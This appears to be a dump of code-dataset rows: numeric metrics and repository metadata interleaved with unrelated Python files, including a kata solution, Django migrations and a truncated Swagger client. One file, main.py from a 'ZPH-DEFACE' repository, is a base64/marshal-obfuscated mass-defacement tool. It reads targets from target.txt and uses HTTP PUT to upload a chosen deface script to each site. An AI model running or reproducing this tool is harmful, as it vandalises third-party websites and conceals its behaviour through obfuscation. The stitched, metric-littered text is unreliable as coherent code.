| 0.009862
| 0.051282
| 0.331361
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c33b56fc6f943edcabd3fb042d53877a7c42f3e3
| 135
|
py
|
Python
|
katas/kyu_8/find_the_position.py
|
the-zebulan/CodeWars
|
1eafd1247d60955a5dfb63e4882e8ce86019f43a
|
[
"MIT"
] | 40
|
2016-03-09T12:26:20.000Z
|
2022-03-23T08:44:51.000Z
|
katas/kyu_8/find_the_position.py
|
akalynych/CodeWars
|
1eafd1247d60955a5dfb63e4882e8ce86019f43a
|
[
"MIT"
] | null | null | null |
katas/kyu_8/find_the_position.py
|
akalynych/CodeWars
|
1eafd1247d60955a5dfb63e4882e8ce86019f43a
|
[
"MIT"
] | 36
|
2016-11-07T19:59:58.000Z
|
2022-03-31T11:18:27.000Z
|
from string import ascii_lowercase
def position(char):
return 'Position of alphabet: {}'.format(ascii_lowercase.index(char) + 1)
| 22.5
| 77
| 0.748148
| 18
| 135
| 5.5
| 0.777778
| 0.282828
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008621
| 0.140741
| 135
| 5
| 78
| 27
| 0.844828
| 0
| 0
| 0
| 0
| 0
| 0.177778
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
c3401e30f8d995f7d558d6f99789dc9afcbea3fc
| 202
|
py
|
Python
|
creational/factory_method/data/parcel.py
|
Kozak24/Patterns
|
351d5c11f7c64ce5d58db37b6715fc8f7d31945a
|
[
"MIT"
] | null | null | null |
creational/factory_method/data/parcel.py
|
Kozak24/Patterns
|
351d5c11f7c64ce5d58db37b6715fc8f7d31945a
|
[
"MIT"
] | null | null | null |
creational/factory_method/data/parcel.py
|
Kozak24/Patterns
|
351d5c11f7c64ce5d58db37b6715fc8f7d31945a
|
[
"MIT"
] | null | null | null |
class Parcel:
def __init__(self, parcel_id: str, weight: float) -> None:
self.parcel_id = parcel_id
self.weight = weight
def __str__(self) -> str:
return self.parcel_id
| 25.25
| 62
| 0.628713
| 27
| 202
| 4.259259
| 0.407407
| 0.278261
| 0.313043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.272277
| 202
| 7
| 63
| 28.857143
| 0.782313
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.166667
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
c358c9827fd52ca6234d44b241c701e5e27aec3c
| 27
|
py
|
Python
|
another_talib/supportandresistance.py
|
marianobilli/another-talib
|
33c377f4da7033f0093fbc5eb7d7118d0b2b964e
|
[
"MIT"
] | null | null | null |
another_talib/supportandresistance.py
|
marianobilli/another-talib
|
33c377f4da7033f0093fbc5eb7d7118d0b2b964e
|
[
"MIT"
] | null | null | null |
another_talib/supportandresistance.py
|
marianobilli/another-talib
|
33c377f4da7033f0093fbc5eb7d7118d0b2b964e
|
[
"MIT"
] | null | null | null |
def demo():
return True
| 13.5
| 15
| 0.62963
| 4
| 27
| 4.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.259259
| 27
| 2
| 15
| 13.5
| 0.85
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
6f0688e199955aa677b17d46c60767e34cdfc7fb
| 38
|
py
|
Python
|
public/views/__init__.py
|
cmisid/Wasty-Database
|
c2e350e3be2cb60df87c9a1481e5da3342c6b73b
|
[
"Apache-2.0"
] | null | null | null |
public/views/__init__.py
|
cmisid/Wasty-Database
|
c2e350e3be2cb60df87c9a1481e5da3342c6b73b
|
[
"Apache-2.0"
] | null | null | null |
public/views/__init__.py
|
cmisid/Wasty-Database
|
c2e350e3be2cb60df87c9a1481e5da3342c6b73b
|
[
"Apache-2.0"
] | null | null | null |
from . import base
from . import rest
| 12.666667
| 18
| 0.736842
| 6
| 38
| 4.666667
| 0.666667
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.210526
| 38
| 2
| 19
| 19
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6f2804e36f7619d7f0f84ccf68602b3aa50df946
| 5,288
|
py
|
Python
|
main.py
|
zaypaihtet/ZPH-DEFACE
|
d19f674931168779caa4cbfc3fb6c9185ca48d89
|
[
"MIT"
] | null | null | null |
main.py
|
zaypaihtet/ZPH-DEFACE
|
d19f674931168779caa4cbfc3fb6c9185ca48d89
|
[
"MIT"
] | null | null | null |
main.py
|
zaypaihtet/ZPH-DEFACE
|
d19f674931168779caa4cbfc3fb6c9185ca48d89
|
[
"MIT"
] | null | null | null |
#Encrypted with Crypton
#Created by OVERDOSIS
import base64
import marshal
exec(marshal.loads(base64.b64decode("YwAAAAAAAAAABQAAAEAAAABzmQAAAHkoAGQAAGQBAGwAAFoAAGQAAGQBAGwBAFoCAGQAAGQBAGwDAFoDAFduGwAEZQQAawoAckUAAQEBZQUAZAIAgwEAAW4BAFhkAwBaBgBkBABaBwBkBQBaCABkBgBaCQBkBwCEAABaCgBkCABkCQCEAQBaCwBkCgCEAABaDABlDQBkCwBrAgBylQBlDABlBgCDAQABbgAAZAEAUygMAAAAaf////9OcyIAAABpbnN0YWxsIHJlcXVlc3RzIGFuZCB0cnkgYWdhaW4gLi4uc8MHAAAKIOKWiOKWiOKWiOKWiOKWiOKWiOKWiOKVl+KWiOKWiOKWiOKWiOKWiOKWiOKVl+KWiOKWiOKVlyAg4paI4paI4pWXICAgICDilojilojilojilojilojilZcg4paI4paI4pWXICAg4paI4paI4pWX4paI4paI4paI4paI4paI4paI4paI4paI4pWXIOKWiOKWiOKWiOKWiOKWiOKWiOKVlyAgICAgCuKVmuKVkOKVkOKWiOKWiOKWiOKVlOKVneKWiOKWiOKVlOKVkOKVkOKWiOKWiOKVl+KWiOKWiOKVkSAg4paI4paI4pWRICAgIOKWiOKWiOKVlOKVkOKVkOKWiOKWiOKVl+KWiOKWiOKVkSAgIOKWiOKWiOKVkeKVmuKVkOKVkOKWiOKWiOKVlOKVkOKVkOKVneKWiOKWiOKVlOKVkOKVkOKVkOKWiOKWiOKVlyAgICAKICDilojilojilojilZTilZ0g4paI4paI4paI4paI4paI4paI4pWU4pWd4paI4paI4paI4paI4paI4paI4paI4pWRICAgIOKWiOKWiOKWiOKWiOKWiOKWiOKWiOKVkeKWiOKWiOKVkSAgIOKWiOKWiOKVkSAgIOKWiOKWiOKVkSAgIOKWiOKWiOKVkSAgIOKWiOKWiOKVkSAgICAKIOKWiOKWiOKWiOKVlOKVnSAg4paI4paI4pWU4pWQ4pWQ4pWQ4pWdIOKWiOKWiOKVlOKVkOKVkOKWiOKWiOKVkSAgICDilojilojilZTilZDilZDilojilojilZHilojilojilZEgICDilojilojilZEgICDilojilojilZEgICDilojilojilZEgICDilojilojilZEgICAgCuKWiOKWiOKWiOKWiOKWiOKWiOKWiOKVl+KWiOKWiOKVkSAgICAg4paI4paI4pWRICDilojilojilZEgICAg4paI4paI4pWRICDilojilojilZHilZrilojilojilojilojilojilojilZTilZ0gICDilojilojilZEgICDilZrilojilojilojilojilojilojilZTilZ0gICAgCuKVmuKVkOKVkOKVkOKVkOKVkOKVkOKVneKVmuKVkOKVnSAgICAg4pWa4pWQ4pWdICDilZrilZDilZ0gICAg4pWa4pWQ4pWdICDilZrilZDilZ0g4pWa4pWQ4pWQ4pWQ4pWQ4pWQ4pWdICAgIOKVmuKVkOKVnSAgICDilZrilZDilZDilZDilZDilZDilZ0gICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAg4paI4paI4paI4paI4paI4paI4pWXIOKWiOKWiOKWiOKWiOKWiOKWiOKWiOKVl+KWiOKWiOKWiOKWiOKWiOKWiOKWiOKVlyDilojilojilojilojilojilZcgIOKWiOKWiOKWiOKWiOKWiOKWiOKVl+KWiOKWiOKWiOKWiOKWiOKWiOKWiOKVlyAgICAgICAgICAgCiAgICAgICAg4paI4paI4pWU4pWQ4pWQ4paI4paI4pWX4paI4paI4pWU4pWQ4pWQ4pWQ4pWQ4pWd4paI4paI4pWU4pWQ4pWQ4pWQ4pWQ4pWd4paI4paI4pWU4pWQ4pWQ4paI4paI4pWX4paI4paI4pWU4pWQ4pWQ4pWQ4pWQ4pWd4paI4paI4pWU4pWQ4pWQ4pWQ4pWQ4pWdICAgICAgICAgICAKICAgICAgICDilojilojilZEgIOKWiOKWiOKVkeKWiOKWiOKWiOKWiOKWiOKVlyAg4paI4paI4paI4paI4paI4pWXICDilojilojilojilojilojilojilojilZHilojilojilZEgICAgIOKWiOKWiOKWiOKWiOKWiOKVlyAgICAgICAgICAgICAKICAgICAgICDilojilojilZEgIOKWiOKWiOKVkeKWiOKWiOKVlOKVkOKVkOKVnSAg4paI4paI4pWU4pWQ4pWQ4pWdICDilojilojilZTilZDilZDilojilojilZHilojilojilZEgICAgIOKWiOKWiOKVlOKVkOKVkOKVnSAgICAgICAgICAgICAKICAgICAgICDilojilojilojilojilojilojilZTilZ3ilojilojilojilojilojilojilojilZfilojilojilZEgICAgIOKWiOKWiOKVkSAg4paI4paI4pWR4pWa4paI4paI4paI4paI4paI4paI4pWX4paI4paI4paI4paI4paI4paI4paI4pWXICAgICAgICAgICAKICAgICAgICDilZrilZDilZDilZDilZDilZDilZ0g4pWa4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWd4pWa4pWQ4pWdICAgICDilZrilZDilZ0gIOKVmuKVkOKVnSDilZrilZDilZDilZDilZDilZDilZ3ilZrilZDilZDilZDilZDilZDilZDilZ0gICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCgoKcwUAAAAbWzMxbXMFAAAAG1szMm1zBQAAABtbMDBtYwEAAAACAAAAAgAAAEMAAABzPQAAAGQBAH0BAHQAAGoBAGoCAGQCAGsEAHInAHQDAHwAAIMBAH0BAG4MAHQEAHwAAIMBAH0BAHQFAHwBAIMBAFMoAwAAAE50AAAAAGkCAAAAKAYAAAB0AwAAAHN5c3QMAAAAdmVyc2lvbl9pbmZvdAUAAABtYWpvcnQFAAAAaW5wdXR0CQAAAHJhd19pbnB1dHQDAAAAc3RyKAIAAAB0BQAAAHRldGV3dAMAAABpcHQoAAAAACgAAAAAUgAAAAB0AQAAAHghAAAAcwoAAAAAAQYBEgEPAgwCcwoAAAB0YXJnZXQudHh0YwIAAAAIAAAACgAAAEMAAABzVAEAAHQAAHwAAGQBAIMCAGoBAIMAAH0CAHQAAHwBAGQBAIMCAI8qAX0DAHwDAGoCAIMAAH0DAHQDAGoEAIMAAH0EAGQCAHQFAHwDAIMBABZHSHj5AHwDAERd8QB9BQB5tgB8BQBqBgCDAAB9BgB8BgBqBwBkAwCDAQB0CABrCAByjABkAwB8BgAXfQYAbgAAfAQAagkAfAYAZAQAF3wAABdkBQB8AgCDAQF9BwB8BwBqCgBkBgBrAABzxwB8BwBqCgBkBwBrBQBy7QB0CwBkCAAXdAwAF2QJABd0CwAXZAoAfAYAfAAAZgIAFhdHSG4jAHQLAGQIABd0DQAXZAsAF3QLABdkCgB8BgB8AABmAgAWF0dIV3FVAAR0AwBqDgBqDwBrCgByLQEBAQFxVQBxVQAEdBAAawoAckUBAQEBSHQRAIMAAAFxVQBYcVUAV1dkAABRWGQAAFMoDAAAAE50AQAAAHJzHAAAAHVwbG9hZGluZyBmaWxlIHRvICVkIHdlYnNpdGVzBwAAAGh0dHA6Ly90AQAAAC90BAAAAGRhdGFpyAAAAGn6AAAAdAEAAABbcwgAAAAgRkFJTEVEIXMIAAAAIF0gJXMvJXNzCAAAACBTVUNDRVNTKBIAAAB0BAAAAG9wZW50BAAAAHJlYWR0CQAAAHJlYWRsaW5lc3QIAAAAcmVxdWVzdHN0BwAAAFNlc3Npb250AwAAAGxlbnQFAAAAc3RyaXB0CgAAAHN0YXJ0c3dpdGh0BQAAAEZhbHNldAMAAABwdXR0CwAAAHN0YXR1c19jb2RldAEAAABtdAEAAABidAEAAABodAoAAABleGNlcHRpb25zdBAAAABSZXF1ZXN0RXhjZXB0aW9udBEAAABLZXlib2FyZEludGVycnVwdHQEAAAAZXhpdCgIAAAAdAYAAABzY3JpcHR0CwAAAHRhcmdldF9maWxldAIAAABvcHQGAAAAdGFyZ2V0dAEAAABzdAMAAAB3ZWJ0BAAAAHNpdGV0AwAAAHJlcSgAAAAAKAAAAABSAAAAAHQDAAAAYW94KgAAAHMmAAAAAAEVARIBDAEMAQ8BDQEDAQwBFQENAR0BHgEmAicCEwEGAQ0BAQBjAQAAAAIAAAAFAAAAQwAAAHNuAAAAfAAAR0h4WAB0AAByXwB5MgB0AQBkAQCDAQB9AQB0AgBqAwBqBAB8AQCDAQBzPgBkAgB8AQAWR0h3CABuAQBQV3EIAAR0BQBrCgByWwABAQFIdAYAgwAAAXEIAFhxCABXdAcAfAEAgwEAAWQAAFMoAwAAAE5zHwAAAEVudGVyIHlvdXIgc2NyaXB0IGRlZmFjZSBuYW1lOiBzEwAAAGZpbGUgJyVzJyBub3QgZm91bmQoCAAAAHQEAAAAVHJ1ZVIJAAAAdAIAAABvc3QEAAAAcGF0aHQGAAAAaXNmaWxlUh4AAABSHwAAAFIoAAAAKAIAAAB0BgAAAF9fYm5fX3QBAAAAYSgAAAAAKAAAAABSAAAAAHQEAAAAbWFpbkAAAABzGAAAAAABBQEJAQMBDAESAQkBBgIFAQ0BAQAPAnQIAAAAX19tYWluX18oDgAAAFIRAAAAdAcAAABvcy5wYXRoUioAAABSAQAAAHQLAAAASW1wb3J0RXJyb3JSHwAAAHQGAAAAYmFubmVyUhoAAABSGwAAAFIZAAAAUgkAAABSKAAAAFIvAAAAdAgAAABfX25hbWVfXygAAAAAKAAAAAAoAAAAAFIAAAAAdAgAAAA8bW9kdWxlPgMAAABzHAAAAAMBDAEMARABDQEOEwYCBgEGAQYCCQkMFgkPDAE=")))
| 1,057.6
| 5,213
| 0.99357
| 24
| 5,288
| 218.916667
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064039
| 0.001891
| 5,288
| 5
| 5,213
| 1,057.6
| 0.931413
| 0.007943
| 0
| 0
| 0
| 0
| 0.986082
| 0.986082
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 11
|
6f3f390afcbc05ad932ae9c81ad63a4061564d82
| 4,563
|
py
|
Python
|
flows/migrations/0001_initial.py
|
stornado/zinga
|
4791d06f153a69a1ed502022b58d4af9c77c5659
|
[
"MIT"
] | null | null | null |
flows/migrations/0001_initial.py
|
stornado/zinga
|
4791d06f153a69a1ed502022b58d4af9c77c5659
|
[
"MIT"
] | null | null | null |
flows/migrations/0001_initial.py
|
stornado/zinga
|
4791d06f153a69a1ed502022b58d4af9c77c5659
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.1.2 on 2018-10-14 16:12
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='BaseTaskModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=50, verbose_name='Title')),
('description', models.TextField(verbose_name='Description')),
('active', models.BooleanField(default=True, verbose_name='Status')),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name='Create Time')),
('update_time', models.DateTimeField(auto_now=True, verbose_name='Create Time')),
],
),
migrations.CreateModel(
name='MailGroup',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=25, verbose_name='Name')),
('description', models.TextField(verbose_name='Description')),
('active', models.BooleanField(default=True, verbose_name='Status')),
],
),
migrations.CreateModel(
name='Periodic',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=50, verbose_name='Title')),
('description', models.TextField(verbose_name='Description')),
('running', models.BooleanField(default=False, verbose_name='Run Status')),
('need_mail', models.BooleanField(default=False, verbose_name='Notify')),
('result_url', models.URLField(verbose_name='Result URL')),
('active', models.BooleanField(default=True, verbose_name='Status')),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name='Create Time')),
('update_time', models.DateTimeField(auto_now=True, verbose_name='Create Time')),
('cron', models.CharField(max_length=50, verbose_name='Cron')),
('mail_receivers', models.ManyToManyField(blank=True, null=True, to='flows.MailGroup', verbose_name='Receivers')),
],
options={
'ordering': ('-active', '-running', 'update_time'),
'abstract': False,
},
),
migrations.CreateModel(
name='Schedule',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=50, verbose_name='Title')),
('description', models.TextField(verbose_name='Description')),
('running', models.BooleanField(default=False, verbose_name='Run Status')),
('need_mail', models.BooleanField(default=False, verbose_name='Notify')),
('result_url', models.URLField(verbose_name='Result URL')),
('active', models.BooleanField(default=True, verbose_name='Status')),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name='Create Time')),
('update_time', models.DateTimeField(auto_now=True, verbose_name='Create Time')),
('start_time', models.DateTimeField(verbose_name='Start Time')),
('end_time', models.DateTimeField(blank=True, null=True, verbose_name='End Time')),
('duration', models.DurationField(verbose_name='Duration')),
('expire_time', models.DateTimeField(verbose_name='Expire Time')),
('mail_receivers', models.ManyToManyField(blank=True, null=True, to='flows.MailGroup', verbose_name='Receivers')),
],
options={
'ordering': ('-active', '-running', 'update_time'),
'abstract': False,
},
),
migrations.CreateModel(
name='CaseExcuteTask',
fields=[
('basetaskmodel_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='flows.BaseTaskModel')),
],
bases=('flows.basetaskmodel',),
),
]
| 53.05814
| 203
| 0.593688
| 440
| 4,563
| 5.977273
| 0.2
| 0.146388
| 0.062738
| 0.061597
| 0.762357
| 0.736502
| 0.724335
| 0.710266
| 0.710266
| 0.710266
| 0
| 0.007401
| 0.259698
| 4,563
| 85
| 204
| 53.682353
| 0.771166
| 0.009862
| 0
| 0.705128
| 1
| 0
| 0.171612
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.025641
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6f44de184b0d498a91e687459c6c773ec7874e04
| 2,350
|
py
|
Python
|
django/policy/migrations/0007_auto_20171025_0901.py
|
zoonoo/aws2
|
583d8ee144c8b5c422a706d8054716c13d064899
|
[
"MIT"
] | null | null | null |
django/policy/migrations/0007_auto_20171025_0901.py
|
zoonoo/aws2
|
583d8ee144c8b5c422a706d8054716c13d064899
|
[
"MIT"
] | null | null | null |
django/policy/migrations/0007_auto_20171025_0901.py
|
zoonoo/aws2
|
583d8ee144c8b5c422a706d8054716c13d064899
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-10-25 09:01
from __future__ import unicode_literals
from decimal import Decimal
from django.db import migrations
import djmoney.models.fields
class Migration(migrations.Migration):
dependencies = [
('policy', '0006_auto_20171025_0144'),
]
operations = [
migrations.AddField(
model_name='accommodationoption',
name='price_krw_currency',
field=djmoney.models.fields.CurrencyField(choices=[('KRW', 'KRW'), ('USD', 'USD')], default='KRW', editable=False, max_length=3),
),
migrations.AddField(
model_name='accommodationoption',
name='price_usd_currency',
field=djmoney.models.fields.CurrencyField(choices=[('KRW', 'KRW'), ('USD', 'USD')], default='USD', editable=False, max_length=3),
),
migrations.AddField(
model_name='price',
name='price_krw_currency',
field=djmoney.models.fields.CurrencyField(choices=[('KRW', 'KRW'), ('USD', 'USD')], default='KRW', editable=False, max_length=3),
),
migrations.AddField(
model_name='price',
name='price_usd_currency',
field=djmoney.models.fields.CurrencyField(choices=[('KRW', 'KRW'), ('USD', 'USD')], default='USD', editable=False, max_length=3),
),
migrations.AlterField(
model_name='accommodationoption',
name='price_krw',
field=djmoney.models.fields.MoneyField(decimal_places=0, default=Decimal('0'), default_currency='KRW', max_digits=7),
),
migrations.AlterField(
model_name='accommodationoption',
name='price_usd',
field=djmoney.models.fields.MoneyField(decimal_places=0, default=Decimal('0'), default_currency='USD', max_digits=4),
),
migrations.AlterField(
model_name='price',
name='price_krw',
field=djmoney.models.fields.MoneyField(decimal_places=0, default=Decimal('0'), default_currency='KRW', max_digits=7),
),
migrations.AlterField(
model_name='price',
name='price_usd',
field=djmoney.models.fields.MoneyField(decimal_places=0, default=Decimal('0'), default_currency='USD', max_digits=4),
),
]
| 40.517241
| 141
| 0.615319
| 248
| 2,350
| 5.653226
| 0.237903
| 0.077033
| 0.121969
| 0.136947
| 0.833096
| 0.833096
| 0.833096
| 0.71826
| 0.71826
| 0.71826
| 0
| 0.027374
| 0.238298
| 2,350
| 57
| 142
| 41.22807
| 0.755866
| 0.028936
| 0
| 0.8
| 1
| 0
| 0.135586
| 0.010092
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.08
| 0
| 0.14
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6f6eba6ddb41ea6516d104103038af76231259df
| 150
|
py
|
Python
|
dataset/__init__.py
|
wheeltune/kid-neuro
|
131ec888e4f0c3ee1d7b4c4ebf57a6b1d5323d8a
|
[
"MIT"
] | null | null | null |
dataset/__init__.py
|
wheeltune/kid-neuro
|
131ec888e4f0c3ee1d7b4c4ebf57a6b1d5323d8a
|
[
"MIT"
] | null | null | null |
dataset/__init__.py
|
wheeltune/kid-neuro
|
131ec888e4f0c3ee1d7b4c4ebf57a6b1d5323d8a
|
[
"MIT"
] | null | null | null |
from .events_dataset import *
from .keystrokes_dataset import *
from .kid_dataset import *
from .multi_dataset import *
from .timing_dataset import *
| 25
| 33
| 0.8
| 20
| 150
| 5.75
| 0.4
| 0.565217
| 0.591304
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.133333
| 150
| 5
| 34
| 30
| 0.884615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
48b89505f2adbbf9bccdfb2ca9b5674ee0e760c4
| 12,969
|
py
|
Python
|
python/swagger_client/api/base_controller_api.py
|
Naras/knowledgetreeRestClients
|
4c79cb091a91bafe37fa2f0d0301245d086c2e5b
|
[
"MIT"
] | null | null | null |
python/swagger_client/api/base_controller_api.py
|
Naras/knowledgetreeRestClients
|
4c79cb091a91bafe37fa2f0d0301245d086c2e5b
|
[
"MIT"
] | null | null | null |
python/swagger_client/api/base_controller_api.py
|
Naras/knowledgetreeRestClients
|
4c79cb091a91bafe37fa2f0d0301245d086c2e5b
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
OpenAPI definition
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: v0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
class BaseControllerApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_person_root(self, **kwargs): # noqa: E501
"""get root person # noqa: E501
get the root node for person # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_person_root(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: PersonResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_person_root_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_person_root_with_http_info(**kwargs) # noqa: E501
return data
def get_person_root_with_http_info(self, **kwargs): # noqa: E501
"""get root person # noqa: E501
get the root node for person # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_person_root_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: PersonResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_person_root" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['kapi auth'] # noqa: E501
return self.api_client.call_api(
'/v1/rootperson', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PersonResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_subject_root(self, **kwargs): # noqa: E501
"""get root subject # noqa: E501
get the root node for person # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_subject_root(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: SubjectResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_subject_root_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_subject_root_with_http_info(**kwargs) # noqa: E501
return data
def get_subject_root_with_http_info(self, **kwargs): # noqa: E501
"""get root subject # noqa: E501
get the root node for person # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_subject_root_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: SubjectResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_subject_root" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
